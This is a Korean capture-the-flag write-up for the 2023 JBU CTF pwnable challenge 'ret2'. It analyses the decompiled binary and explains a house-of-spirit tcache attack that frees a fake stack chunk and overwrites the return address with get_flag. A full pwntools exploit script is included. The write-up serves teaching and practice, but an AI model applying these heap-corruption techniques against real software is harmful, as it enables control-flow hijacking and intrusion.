[2023 JBU CTF] ret2 write-up

분야 : Pwnable

🧐 문제

문제명 : ret2

특정 주소를 free할 수 있다. bins의 원하는 주소를 넣고, malloc으로 넣었던 주소를 할당받을 수 있다.

위 구성이 문제파일로 제공된다. 로컬에서 도커 컨테이너를 올려 익스플로잇을 진행하고, 동일한 페이로드를 서버에 전송하면 플래그를 획득할 수 있다.

🧐 분석

위와 같은 보호 기법이 걸려있다. 바이너리를 분석해보자.

🧐 main 함수 분석

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-34h] BYREF
  char buf[40]; // [rsp+10h] [rbp-30h] BYREF
  ssize_t v6; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  printf("Your name : ");
  v6 = read(0, buf, 0x39uLL);
  if ( v6 <= 0 )
    buf[0] = 0;
  else
    buf[v6 - 1] = 0;
  printf("Happy birthday. Today is %s's birthday\n", buf);
  while ( 1 )
  {
    option();
    __isoc99_scanf("%d", &v4);
    if ( v4 <= 0 || v4 > 4 )
      break;
    switch ( v4 )
    {
      case 4:
        puts("Options in development :P");
        gift(buf);
        break;
      case 3:
        wish_edit();
        break;
      case 1:
        wish_show();
        break;
      default:
        wish_add();
        break;
    }
  }
  puts("This option is disabled.");
  return 0;
}

main함수 이다. 생일자 이름을 물어보고, buf에 입력받는다. 해당 부분에서 bof가 터질 것 같지만, RET변조가 되지 않는다. 이후 메뉴를 선택하여 메뉴에 맞는 함수가 호출된다.

🧐 wish_show 함수 분석

자신의 위시리스트를 보여주는 함수이다. 반복문을 통해 위시리스트를 출력한다.

🧐 wish_add 함수 분석

size를 입력받고 chunk를 할당한다. 총 10개의 chunk까지 할당할 수 있다.

🧐 wish_edit 함수 분석

위시리스트를 수정해주는 함수이다. memset함수로 값을 초기화하고, 할당되었던 size만큼 입력을 받는다.

🧐 gift 함수 분석

먼저, 인자로 넘어온 buf변수의 주소를 출력해준다. 또한, 정수를 입력받아 해당하는 주소를 free한다. 이 함수를 통해 스택 부분에 fake chunk를 구성하고, 해당 부분을 free하여 스택 주소를 bins에 넣을 수 있다.

🧐 get_flag 함수

get_flag함수의 시작주소는 0x401276임을 알 수 있다. 이 함수를 호출하면 플래그를 얻을 수 있다.

🧐 공격 시나리오

Your name을 입력할 때, chunk라고 생각하고 size를 넣어준다.
1번에서 입력한 buf+16(chunk의 mem주소)를 free한다.
bins에 들어간 size만큼 스택 공간을 다시 할당받고, 입력을 통해 RET를 변조한다.

💡house of spirit

[how2heap] house_of_spirit

Indexhouse_of_spirit.c (glibc 2.23)Analyze with GDBtcache house of spirit (glibc 2.26~)house of spirit 기법에 대해 정리해볼 것이다. 이 기법은 fastbin chunk 크기의 fake cunk를 해제하여 bin에 삽입하는 공격이다. house_of_spiri

she11.tistory.com

해당 문제를 만들면서, house of spirit 기법에 대해 공부했었다.

🧐 익스플로잇

from pwn import *
context.log_level = "debug"

#p = process("./ret2")
e = ELF("./ret2")
p = remote('192.168.83.137', 13579)

flag_addr = e.sym["get_flag"]

def show():
    p.sendlineafter(b"> ", str(1))

def add(size, data):
    p.sendlineafter(b"> ", str(2))
    p.sendlineafter(b"Size: ", str(size))
    p.sendlineafter(b"Data: ", data)

def edit(idx, data):
    p.sendlineafter(b"> ", str(3))
    p.sendlineafter(b"Index: ", str(idx))
    p.sendlineafter(b"Data: ", data)

def gift():
    p.sendlineafter(b"> ", str(4))
    p.recvuntil(b'is ')
    stackAddr = int(p.recvn(14),16)
    freeAddr = stackAddr + 16
    log.info('\tstack addr :' + hex(stackAddr))
    log.info('\tfree addr :' + hex(freeAddr))

    p.sendlineafter(b"addr: ", str(freeAddr))

def shell():
    p.sendlineafter(b"> ", str(99))

payload = b'A' * 8 + p64(80)
p.sendafter(b"Your name :", payload)
add(16, b'AAAA')
gift()

payload = b'A'*(0x28)
payload += p64(flag_addr)

add(64, payload)

shell()

p.interactive()

해당 exploit 코드를 실행하면 플래그를 얻을 수 있다.

위 사진은 free가 진행되었을 때의 bins의 상태이다. tcachebins의 0x50(80)에서 스택 주소가 들어간 것을 볼 수 있다.

add(64, payload) 우리가 넣고자 하는 값이 잘 들어가졌다.

read함수에서 rbp와 buf의 주소가 0x30만큼 떨어져 있기 때문에, 앞서 얻은 주소인 0x7ffc53f024d0에서 +0x38을 하면 main함수의 RET공간이 된다.

read함수로는 덮을 수 없었던 RET가 get_flag함수 주소로 덮였다. 따라서, flag 값을 출력해준다.

🧐 문제

🧐 분석

🧐 공격 시나리오

🧐 익스플로잇

티스토리툴바